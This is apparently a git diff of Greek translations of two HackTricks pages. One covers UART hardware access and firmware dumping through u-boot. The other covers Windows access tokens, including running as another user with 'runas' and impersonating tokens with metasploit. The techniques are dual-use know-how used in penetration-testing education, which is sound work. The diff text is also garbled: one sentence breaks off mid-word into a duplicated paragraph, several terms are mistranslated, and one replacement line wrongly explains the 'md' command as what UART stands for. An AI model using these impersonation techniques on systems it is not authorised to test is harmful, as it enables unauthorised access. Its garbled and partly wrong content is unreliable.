* Για να αναγνωρίσετε τη θύρα **TX**, λειτουργία **DC τάσης** έως 20 V τάση, μαύρη στήλη στη γη, κόκκινη στην ακίδα, και ενεργοποιήστε τη συσκευή. Αν βρείτε ότι η τάση διακυμαίνεται για λίγα δευτερόλεπτα και στη συνέχεια σταθεροποιείται στην τιμή της Vcc, πιθανότατα έχετε βρει τη θύρα TX. Αυτό συμβαίνει επειδή κατά την ενεργοποίηση, στέλνει κάποια δεδομένα εντοπισμού.
|
||||
* Η θύρα **RX** θα είναι η πλησιέστερη στις άλλες 3, έχει τη χαμηλότερη διακύμανση τάσης και τη χαμηλότερη συνολική τιμή από όλες τις ακίδες UART.
|
||||
|
||||
Μπορείτε να μπερδέψετε τις θύρες TX και RX και τίποτα δεν θα συμβεί, αλλά αν μπερδέψετε την GND και τη θύρα VCC ενδέχεται να καταστρέψετε το κύκλωμα.
|
||||
|
||||
Σε ορισμένες συσκευές-στόχους, η θύρα UART είναι απενεργοποιημένη από τον κατασκευαστή με την απενεργοποίηση της RX ή της TX ή ακόμη και και των δύο. Σε αυτήν την περίπτωση, μπορεί να είναι χρήσιμο να εντοπίσετε τις συνδέσεις στο πλακέτα κυκλώματος και να βρείτε κάποιο σημείο διακοπής. Ένα ισχυρό υπόδειγμα για την επιβεβαίωση της μη ανίχνευσης του UART και τη διάλυση του κυκλώματος είναι να ελέγξετε την εγγύηση της συσκευής. Αν η συσκευή έχει αποσταλεί με κάποια εγγύηση, ο κατασκευαστής αφήνει κάποιες διεπαφές εντοπισμού σφαλμάτων (σε αυτήν την περίπτωση, UART) και συνεπώς, πρέπει να έχει αποσυνδέσει το UART και θα το συνδέσει ξανά κατά την αποσφαλμάτωση. Αυτές οι ακίδες διακοπής μπορούν να συνδεθούν με κόλληση ή μεταλλικά καλώδια.
|
||||
|
||||
### Αναγνώριση του Baud Rate του UART
|
||||
|
||||
Ο ευκολότερος τρόπος για να αναγνωρίσετε το σωστό baud rate είναι να κοιτά
|
||||
Σε ορισμένες συσκευές-στόχους, η θύρα UART είναι απενεργοποιημένη από τον κατασκευαστή με την απενεργοποίηση της RX ή της TX ή και των δύο. Σε αυτήν την περίπτωση, μπορεί να είναι χρήσιμο να ανιχνεύσετε τις συνδέσεις στο πίνακα κυκλωμάτων και να βρείτε κάποιο σημείο διακοπής. Ένα ισχυρό υπόδειγμα για την επιβεβαίωση της μη ανίχνευσης του UART και τη διάλυση του κυκλώματος είναι να ελέγξετε την εγγύηση της συσκευής. Αν η συσκευή έχει αποσταλ
|
||||
```
|
||||
ls /dev/
|
||||
```
|
||||
|
@ -67,9 +77,9 @@ minicom -s
|
|||
|
||||
Σε περίπτωση που οι προσαρμογείς UART Serial σε USB δεν είναι διαθέσιμοι, το Arduino UNO R3 μπορεί να χρησιμοποιηθεί με ένα γρήγορο χάκινγκ. Δεδομένου ότι το Arduino UNO R3 είναι συνήθως διαθέσιμο παντού, αυτό μπορεί να εξοικονομήσει πολύ χρόνο.
|
||||
|
||||
Το Arduino UNO R3 διαθέτει έναν προσαρμογέα USB σε σειριακή θύρα που είναι ενσωματωμένος στην πλακέτα. Για να λάβετε σύνδεση UART, απλώς αποσυνδέστε το μικροελεγκτή Atmel 328p από την πλακέτα. Αυτό το χάκι λειτουργεί σε παραλλαγές του Arduino UNO R3 που δεν έχουν το Atmel 328p κολλημένο στην πλακέτα (χρησιμοποιείται η SMD έκδοση). Συνδέστε τον ακροδέκτη RX του Arduino (Ψηφιακός Ακροδέκτης 0) στον ακροδέκτη TX της διεπαφής UART και τον ακροδέκτη TX του Arduino (Ψηφιακός Ακροδέκτης 1) στον ακροδέκτη RX της διεπαφής UART.
|
||||
Το Arduino UNO R3 διαθέτει έναν προσαρμογέα USB σε σειριακή θύρα που είναι ενσωματωμένος στην πλακέτα. Για να λάβετε σύνδεση UART, απλώς αποσυνδέστε το μικροελεγκτή Atmel 328p από την πλακέτα. Αυτό το χάκι λειτουργεί σε παραλλαγές του Arduino UNO R3 που δεν έχουν το Atmel 328p κολλημένο στην πλακέτα (χρησιμοποιείται η έκδοση SMD). Συνδέστε τον ακροδέκτη RX του Arduino (Ψηφιακός Ακροδέκτης 0) στον ακροδέκτη TX της διεπαφής UART και τον ακροδέκτη TX του Arduino (Ψηφιακός Ακροδέκτης 1) στον ακροδέκτη RX της διεπαφής UART.
|
||||
|
||||
Τέλος, συνιστάται να χρησιμοποιήσετε το Arduino IDE για να λάβετε την Σειριακή Κονσόλα. Στην ενότητα `εργαλεία` στο μενού, επιλέξτε την επιλογή `Σειριακή Κονσόλα` και ορίστε το ρυθμό baud σύμφωνα με τη διεπαφή UART.
|
||||
Τέλος, συνιστάται να χρησιμοποιήσετε το Arduino IDE για να αποκτήσετε πρόσβαση στην Σειριακή Κονσόλα. Στην ενότητα `εργαλεία` στο μενού, επιλέξτε την επιλογή `Σειριακή Κονσόλα` και ορίστε το ρυθμό baud όπως απαιτείται από τη διεπαφή UART.
|
||||
|
||||
## Bus Pirate
|
||||
|
||||
|
@ -145,23 +155,23 @@ Escritura inicial completada:
|
|||
AAA Hi Dreg! AAA
|
||||
waiting a few secs to repeat....
|
||||
```
|
||||
## Ανάκτηση Firmware με την Κονσόλα UART
|
||||
## Απορρόφηση Firmware με την Κονσόλα UART
|
||||
|
||||
Η Κονσόλα UART παρέχει έναν εξαιρετικό τρόπο για να εργαστείτε με το υπόκειμενο firmware σε περιβάλλον εκτέλεσης. Ωστόσο, όταν η πρόσβαση στην Κονσόλα UART είναι μόνο για ανάγνωση, μπορεί να εισάγει πολλούς περιορισμούς. Σε πολλές ενσωματωμένες συσκευές, το firmware αποθηκεύεται σε EEPROMs και εκτελείται σε επεξεργαστές που έχουν μνήμη αποθήκευσης. Επομένως, το firmware παραμένει μόνο για ανάγνωση, αφού το αρχικό firmware κατά την κατασκευή βρίσκεται μέσα στην ίδια την EEPROM και οποιαδήποτε νέα αρχεία θα χαθούν λόγω της αποθηκευτικής μνήμης. Επομένως, η ανάκτηση του firmware είναι μια πολύτιμη προσπάθεια κατά την εργασία με ενσωματωμένα firmware.
|
||||
Η Κονσόλα UART παρέχει έναν εξαιρετικό τρόπο για να εργαστείτε με το υποκείμενο firmware σε περιβάλλον εκτέλεσης. Ωστόσο, όταν η πρόσβαση στην Κονσόλα UART είναι μόνο για ανάγνωση, μπορεί να εισάγει πολλούς περιορισμούς. Σε πολλές ενσωματωμένες συσκευές, το firmware αποθηκεύεται σε EEPROMs και εκτελείται σε επεξεργαστές που έχουν αποθηκευτική μνήμη. Επομένως, το firmware παραμένει μόνο για ανάγνωση, αφού το αρχικό firmware κατά την κατασκευή βρίσκεται μέσα στην ίδια την EEPROM και οποιαδήποτε νέα αρχεία θα χαθούν λόγω της αποθηκευτικής μνήμης. Επομένως, η απορρόφηση του firmware είναι μια πολύτιμη προσπάθεια κατά την εργασία με ενσωματωμένα firmware.
|
||||
|
||||
Υπάρχουν πολλοί τρόποι για να γίνει αυτό και η ενότητα SPI καλύπτει μεθόδους για την εξαγωγή του firmware απευθείας από την EEPROM με διάφορες συσκευές. Ωστόσο, συνιστάται να δοκιμάσετε πρώτα την ανάκτηση του firmware με την Κονσόλα UART, αφού η ανάκτηση του firmware με φυσικές συσκευές και εξωτερικές αλληλεπιδράσεις μπορεί να είναι επικίνδυνη.
|
||||
Υπάρχουν πολλοί τρόποι για να γίνει αυτό και η ενότητα SPI καλύπτει μεθόδους για την εξαγωγή του firmware απευθείας από την EEPROM με διάφορες συσκευές. Παρόλα αυτά, συνιστάται να δοκιμάσετε πρώτα την απορρόφηση του firmware με την UART, αφού η απορρόφηση του firmware με φυσικές συσκευές και εξωτερικές αλληλεπιδράσεις μπορεί να είναι επικίνδυνη.
|
||||
|
||||
Η ανάκτηση του firmware από την Κονσόλα UART απαιτεί πρώτα την πρόσβαση στους bootloaders. Πολλοί δημοφιλείς προμηθευτές χρησιμοποιούν το <b>uboot</b> (Universal Bootloader) ως τον bootloader τους για τη φόρτωση του Linux. Επομένως, η πρόσβαση στο <b>uboot</b> είναι απαραίτητη.
|
||||
Η απορρόφηση του firmware από την Κονσόλα UART απαιτεί πρώτα την πρόσβαση στους bootloaders. Πολλοί δημοφιλείς προμηθευτές χρησιμοποιούν το <b>uboot</b> (Universal Bootloader) ως τον bootloader τους για τη φόρτωση του Linux. Επομένως, η πρόσβαση στο <b>uboot</b> είναι απαραίτητη.
|
||||
|
||||
Για να έχετε πρόσβαση στον <b>boot</b> bootloader, συνδέστε τη θύρα UART στον υπολογιστή και χρησιμοποιήστε οποιοδήποτε εργαλείο Serial Console και κρατήστε την τροφοδοσία της συσκευής αποσυνδεδεμένη. Μόλις είναι έτοιμη η εγκατάσταση, πατήστε το πλήκτρο Enter και κρατήστε το. Τέλος, συνδέστε την τροφοδοσία της συσκευής και αφήστε τη να εκκινήσει.
|
||||
Για να έχετε πρόσβαση στον <b>boot</b> bootloader, συνδέστε τη θύρα UART στον υπολογιστή και χρησιμοποιήστε οποιοδήποτε εργαλείο Serial Console και κρατήστε την τροφοδοσία της συσκευής αποσυνδεδεμένη. Μόλις το σύστημα είναι έτοιμο, πατήστε το πλήκτρο Enter και κρατήστε το. Τέλος, συνδέστε την τροφοδοσία της συσκευής και αφήστε τη να εκκινήσει.
|
||||
|
||||
Κάνοντας αυτό, θα διακόψετε το <b>uboot</b> από το να φορτώσει και θα παρέχει ένα μενού. Συνιστάται να κατανοήσετε τις εντολές του <b>uboot</b> και να χρησιμοποιήσετε το μενού βοήθειας για να τις καταχωρίσετε. Αυτό μπορεί να είναι η εντολή `help`. Δεδομένου ότι διαφορετικοί προμηθευτές χρησιμοποιούν διαφορετικές ρυθμίσεις, είναι απαραίτητο να κατανοήσετε καθέναν ξεχωριστά.
|
||||
Κάνοντας αυτό, θα διακόψετε το <b>uboot</b> από τη φόρτωση και θα παρέχει ένα μενού. Συνιστάται να κατανοήσετε τις εντολές του <b>uboot</b> και να χρησιμοποιήσετε το μενού βοήθειας για να τις καταχωρίσετε. Αυτό μπορεί να είναι η εντολή `help`. Δεδομένου ότι διαφορετικοί προμηθευτές χρησιμοποιούν διαφορετικές ρυθμίσεις, είναι απαραίτητο να κατανοήσετε καθέναν ξεχωριστά.
|
||||
|
||||
Συνήθως, η εντολή για την ανάκτηση του firmware είναι:
|
||||
Συνήθως, η εντολή για την απορρόφηση του firmware είναι:
|
||||
```
|
||||
md
|
||||
```
|
||||
Το "MD" σημαίνει "απορρόφηση μνήμης". Αυτό θα απορροφήσει τη μνήμη (περιεχόμενο EEPROM) στην οθόνη. Συνιστάται να καταγράψετε την έξοδο της σειριακής κονσόλας πριν ξεκινήσετε τη διαδικασία για να καταγράψετε την απορρόφηση μνήμης.
|
||||
Το UART αντιπροσωπεύει το "Universal Asynchronous Receiver/Transmitter", το οποίο αναλαμβάνει να εκτυπώσει τη μνήμη (περιεχόμενο EEPROM) στην οθόνη. Συνιστάται να καταγράψετε την έξοδο της Serial Console πριν ξεκινήσετε τη διαδικασία για να αιχμαλωτίσετε τη μνήμη.
|
||||
|
||||
Τέλος, απλά αφαιρέστε όλα τα περιττά δεδομένα από το αρχείο καταγραφής και αποθηκεύστε το αρχείο ως `filename.rom` και χρησιμοποιήστε το binwalk για να εξάγετε τα περιεχόμενα:
|
||||
```
|
||||
|
@ -170,3 +180,31 @@ binwalk -e <filename.rom>
|
|||
Αυτό θα εμφανίσει τα πιθανά περιεχόμενα από το EEPROM σύμφωνα με τις υπογραφές που βρέθηκαν στο αρχείο hex.
|
||||
|
||||
Παρόλο που είναι απαραίτητο να σημειωθεί ότι δεν είναι πάντα το σενάριο ότι το <b>uboot</b> είναι ξεκλείδωτο ακόμα κι αν χρησιμοποιείται. Αν το πλήκτρο Enter δεν κάνει τίποτα, ελέγξτε για διαφορετικά πλήκτρα όπως το Space Key, κλπ. Αν ο φορτιστής είναι κλειδωμένος και δεν διακόπτεται, αυτή η μέθοδος δεν θα λειτουργήσει. Για να ελέγξετε αν το <b>uboot</b> είναι ο φορτιστής για τη συσκευή, ελέγξτε την έξοδο στην κονσόλα UART κατά την εκκίνηση της συσκευής. Μπορεί να αναφέρει το <b>uboot</b> κατά την εκκίνηση.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας χάρη στην υποβολή PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,23 +1,36 @@
|
|||
# Access Tokens
|
||||
# Διακριτικά Πρόσβασης
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks στο AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε** στην [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Διαπιστευτήρια Πρόσβασης
|
||||
## WhiteIntel
|
||||
|
||||
Κάθε **χρήστης που έχει συνδεθεί** στο σύστημα **διαθέτει ένα διαπιστευτήριο πρόσβασης με πληροφορίες ασφαλείας** για αυτήν τη συνεδρία σύνδεσης. Το σύστημα δημιουργεί ένα διαπιστευτήριο πρόσβασης όταν ο χρήστης συνδέεται. **Κάθε διεργασία που εκτελείται** εκ μέρους του χρήστη **έχει ένα αντίγραφο του διαπιστευτηρίου πρόσβασης**. Το διαπιστευτήριο αναγνωρίζει τον χρήστη, τις ομάδες του χρήστη και τα προνόμια του χρήστη. Ένα διαπιστευτήριο περιέχει επίσης ένα αναγνωριστικό SID (Security Identifier) σύνδεσης που αναγνωρίζει την τρέχουσα συνεδρία σύνδεσης.
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Διακριτικά Πρόσβασης
|
||||
|
||||
Κάθε **χρήστης που έχει συνδεθεί** στο σύστημα **διαθέτει ένα διακριτικό πρόσβασης με πληροφορίες ασφαλείας** για αυτήν τη συνεδρία σύνδεσης. Το σύστημα δημιουργεί ένα διακριτικό πρόσβασης όταν ο χρήστης συνδέεται. **Κάθε διεργασία που εκτελείται** εκ μέρους του χρήστη **έχει ένα αντίγραφο του διακριτικού πρόσβασης**. Το διακριτικό αναγνωρίζει τον χρήστη, τις ομάδες του χρήστη και τα προνόμια του χρήστη. Ένα διακριτικό περιλαμβάνει επίσης ένα SID σύνδεσης (Αναγνωριστικό Ασφάλειας) που αναγνωρίζει την τρέχουσα συνεδρία σύνδεσης.
|
||||
|
||||
Μπορείτε να δείτε αυτές τις πληροφορίες εκτελώντας την εντολή `whoami /all`
|
||||
|
||||
```
|
||||
whoami /all
|
||||
|
||||
|
@ -61,51 +74,46 @@ SeUndockPrivilege Remove computer from docking station Disabled
|
|||
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
|
||||
SeTimeZonePrivilege Change the time zone Disabled
|
||||
```
|
||||
|
||||
ή χρησιμοποιώντας το _Process Explorer_ από τα Sysinternals (επιλέξτε διεργασία και προσπελάστε την καρτέλα "Ασφάλεια"):
|
||||
|
||||
![](<../../.gitbook/assets/image (321).png>)
|
||||
![](<../../.gitbook/assets/image (769).png>)
|
||||
|
||||
### Τοπικός διαχειριστής
|
||||
|
||||
Όταν ένας τοπικός διαχειριστής συνδέεται, **δημιουργούνται δύο διαπιστευτήρια πρόσβασης**: Ένα με δικαιώματα διαχειριστή και ένα άλλο με κανονικά δικαιώματα. **Από προεπιλογή**, όταν αυτός ο χρήστης εκτελεί μια διεργασία, χρησιμοποιείται αυτό με τα **κανονικά** (μη-διαχειριστή) **δικαιώματα**. Όταν αυτός ο χρήστης προσπαθεί να **εκτελέσει** οτιδήποτε **ως διαχειριστής** ("Εκτέλεση ως διαχειριστής" για παράδειγμα), θα χρησιμοποιηθεί το **UAC** για να ζητηθεί άδεια.\
|
||||
Εάν θέλετε να [**μάθετε περισσότερα για το UAC, διαβάστε αυτήν τη σελίδα**](../authentication-credentials-uac-and-efs/#uac)**.**
|
||||
Όταν ένας τοπικός διαχειριστής συνδεθεί, **δημιουργούνται δύο διαθέσιμα διαπιστευτήρια**: Ένα με δικαιώματα διαχειριστή και ένα με κανονικά δικαιώματα. **Από προεπιλογή**, όταν αυτός ο χρήστης εκτελεί μια διαδικασία χρησιμοποιείται το ένα με **κανονικά** (μη διαχειριστή) **δικαιώματα**. Όταν αυτός ο χρήστης προσπαθεί να **εκτελέσει** οτιδήποτε **ως διαχειριστής** ("Εκτέλεση ως Διαχειριστής" για παράδειγμα) το **UAC** θα χρησιμοποιηθεί για να ζητήσει άδεια.\
|
||||
Αν θέλετε να [**μάθετε περισσότερα για το UAC διαβάστε αυτήν τη σελίδα**](../authentication-credentials-uac-and-efs/#uac)**.**
|
||||
|
||||
### Παραπληροφόρηση χρήστη διαπιστευτηρίων
|
||||
|
||||
Εάν έχετε **έγκυρα διαπιστευτήρια οποιουδήποτε άλλου χρήστη**, μπορείτε να **δημιουργήσετε** μια **νέα συνεδρία σύνδεσης** με αυτά τα διαπιστευτήρια:
|
||||
### Παρασύρεση χρήστη διαπιστευτηριακών στοιχείων
|
||||
|
||||
Αν έχετε **έγκυρα διαπιστευτήρια οποιουδήποτε άλλου χρήστη**, μπορείτε να **δημιουργήσετε** μια **νέα συνεδρία σύνδεσης** με αυτά τα διαπιστευτήρια:
|
||||
```
|
||||
runas /user:domain\username cmd.exe
|
||||
```
|
||||
|
||||
Το **access token** έχει επίσης μια **αναφορά** των συνεδριών σύνδεσης μέσα στο **LSASS**, αυτό είναι χρήσιμο αν η διαδικασία χρειάζεται να έχει πρόσβαση σε ορισμένα αντικείμενα του δικτύου.\
|
||||
Μπορείτε να εκκινήσετε μια διαδικασία που **χρησιμοποιεί διαφορετικές πιστοποιήσεις για την πρόσβαση σε υπηρεσίες δικτύου** χρησιμοποιώντας:
|
||||
|
||||
Το **access token** έχει επίσης μια **αναφορά** των συνεδριών σύνδεσης μέσα στο **LSASS**, αυτό είναι χρήσιμο αν η διαδικασία χρειάζεται πρόσβαση σε κάποια αντικείμενα του δικτύου.\
|
||||
Μπορείτε να εκκινήσετε μια διαδικασία που **χρησιμοποιεί διαφορετικές διαπιστευτήριες για την πρόσβαση σε υπηρεσίες δικτύου** χρησιμοποιώντας:
|
||||
```
|
||||
runas /user:domain\username /netonly cmd.exe
|
||||
```
|
||||
|
||||
Αυτό είναι χρήσιμο εάν έχετε διαπιστευτήρια για πρόσβαση σε αντικείμενα στο δίκτυο, αλλά αυτά τα διαπιστευτήρια δεν είναι έγκυρα μέσα στον τρέχοντα υπολογιστή, καθώς θα χρησιμοποιηθούν μόνο στο δίκτυο (στον τρέχοντα υπολογιστή θα χρησιμοποιηθούν οι τρέχουσες δικαιώματα του τρέχοντος χρήστη).
|
||||
Αυτό είναι χρήσιμο εάν έχετε διαπιστευτήρια πρόσβασης σε αντικείμενα στο δίκτυο, αλλά αυτά τα διαπιστευτήρια δεν είναι έγκυρα μέσα στο τρέχον σύστημα, καθώς θα χρησιμοποιηθούν μόνο στο δίκτυο (στο τρέχον σύστημα θα χρησιμοποιηθούν οι τρέχουσες δικαιώματα χρήστη).
|
||||
|
||||
### Τύποι διακριτικών
|
||||
|
||||
Υπάρχουν δύο τύποι διακριτικών διαθέσιμα:
|
||||
Υπάρχουν δύο τύποι διακριτικών διαθέσιμοι:
|
||||
|
||||
* **Κύριο διακριτικό**: Λειτουργεί ως αναπαράσταση των διαπιστευτηρίων ασφαλείας ενός διεργασίας. Η δημιουργία και η συσχέτιση των κύριων διακριτικών με τις διεργασίες είναι ενέργειες που απαιτούν αυξημένα δικαιώματα, τονίζοντας την αρχή του διαχωρισμού των δικαιωμάτων. Συνήθως, ένας υπηρεσίας πιστοποίησης είναι υπεύθυνος για τη δημιουργία του διακριτικού, ενώ μια υπηρεσία σύνδεσης χειρίζεται τη συσχέτισή του με το κέλυφος του λειτουργικού συστήματος του χρήστη. Αξίζει να σημειωθεί ότι οι διεργασίες κληρονομούν το κύριο διακριτικό της γονικής διεργασίας κατά τη δημιουργία τους.
|
||||
* **Διακριτικό υποκατάστασης**: Επιτρέπει σε μια εφαρμογή εξυπηρετητή να προσωρινά υιοθετήσει την ταυτότητα του πελάτη για πρόσβαση σε ασφαλή αντικείμενα. Αυτός ο μηχανισμός είναι κατηγοριοποιημένος σε τέσσερα επίπεδα λειτουργίας:
|
||||
* **Ανώνυμο**: Παρέχει πρόσβαση στον εξυπηρετητή όπως ένας μη αναγνωρισμένος χρήστης.
|
||||
* **Αναγνώριση**: Επιτρέπει στον εξυπηρετητή να επαληθεύσει την ταυτότητα του πελάτη χωρίς να τη χρησιμοποιήσει για πρόσβαση σε αντικείμενα.
|
||||
* **Υποκατάσταση**: Επιτρέπει στον εξυπηρετητή να λειτουργεί υπό την ταυτότητα του πελάτη.
|
||||
* **Ανάθεση**: Παρόμοιο με την Υποκατάσταση, αλλά περιλαμβάνει τη δυνατότητα επέκτασης αυτής της υπόθεσης ταυτότητας σε απομακρυσμένα συστήματα με τα οποία αλληλεπιδρά ο εξυπηρετητής, εξασφαλίζοντας τη διατήρηση των διαπιστευτηρίων.
|
||||
* **Κύριο Διακριτικό**: Λειτουργεί ως αναπαράσταση των διαπιστευτηρίων ασφαλείας ενός διεργασίας. Η δημιουργία και η συσχέτιση των κύριων διακριτικών με διεργασίες είναι ενέργειες που απαιτούν αυξημένα δικαιώματα, υπογραμμίζοντας την αρχή του διαχωρισμού δικαιωμάτων. Συνήθως, ένα υπηρεσίας πιστοποίησης είναι υπεύθυνο για τη δημιουργία διακριτικών, ενώ μια υπηρεσία σύνδεσης χειρίζεται τη συσχέτισή τους με το κέλυφος λειτουργικού συστήματος του χρήστη. Αξίζει να σημειωθεί ότι οι διεργασίες κληρονομούν το κύριο διακριτικό της γονικής διεργασίας τους κατά τη δημιουργία.
|
||||
* **Διακριτικό Προσωποποίησης**: Δίνει σε μια εφαρμογή εξυπηρετητή τη δυνατότητα να υιοθετήσει προσωρινά την ταυτότητα του πελάτη για πρόσβαση σε ασφαλή αντικείμενα. Αυτός ο μηχανισμός είναι στρωμένος σε τέσσερα επίπεδα λειτουργίας:
|
||||
* **Ανώνυμο**: Χορηγεί πρόσβαση στον εξυπηρετητή παρόμοια με αυτήν ενός μη αναγνωρισμένου χρήστη.
|
||||
* **Ταυτοποίηση**: Επιτρέπει στον εξυπηρετητή να επαληθεύσει την ταυτότητα του πελάτη χωρίς να τη χρησιμοποιεί για πρόσβαση σε αντικείμενα.
|
||||
* **Προσωποποίηση**: Επιτρέπει στον εξυπηρετητή να λειτουργεί υπό την ταυτότητα του πελάτη.
|
||||
* **Αναθέσεις**: Παρόμοιο με την Προσωποποίηση, αλλά περιλαμβάνει τη δυνατότητα επέκτασης αυτής της υπόθεσης ταυτότητας σε απομακρυσμένα συστήματα με τα οποία αλληλεπιδρά ο εξυπηρετητής, εξασφαλίζοντας τη διατήρηση των διαπιστευτηρίων.
|
||||
|
||||
#### Παραπλανήστε διακριτικά
|
||||
#### Προσωποποίηση Διακριτικών
|
||||
|
||||
Χρησιμοποιώντας τον **module incognito** του metasploit, εάν έχετε αρκετά δικαιώματα, μπορείτε εύκολα να **καταγράψετε** και να **παραπλανήσετε** άλλα **διακριτικά**. Αυτό μπορεί να είναι χρήσιμο για να εκτελέσετε ενέργειες ως να ήσασταν ο άλλος χρήστης. Μπορείτε επίσης να **αναβαθμίσετε τα δικαιώματα** με αυτήν την τεχνική.
|
||||
Χρησιμοποιώντας το _**module incognito**_ του metasploit, εάν έχετε αρκετά δικαιώματα, μπορείτε εύκολα να **καταλογογραφήσετε** και **προσωποποιήσετε** άλλα **διακριτικά**. Αυτό θα μπορούσε να είναι χρήσιμο για να εκτελέσετε **ενέργειες ως αν υπήρχετε ο άλλος χρήστης**. Μπορείτε επίσης να **αναβαθμίσετε τα δικαιώματα** με αυτήν την τεχνική.
|
||||
|
||||
### Δικαιώματα διακριτικών
|
||||
### Δικαιώματα Διακριτικών
|
||||
|
||||
Μάθετε ποια **δικαιώματα διακριτικών μπορούν να καταχραστούν για την αναβάθμιση των δικαιωμάτων:**
|
||||
Μάθετε ποια **δικαιώματα διακριτικών μπορούν να καταχραστούν για την ανάδειξη δικαιωμάτων:**
|
||||
|
||||
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
|
||||
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
|
||||
|
@ -115,16 +123,4 @@ runas /user:domain\username /netonly cmd.exe
|
|||
|
||||
## Αναφορές
|
||||
|
||||
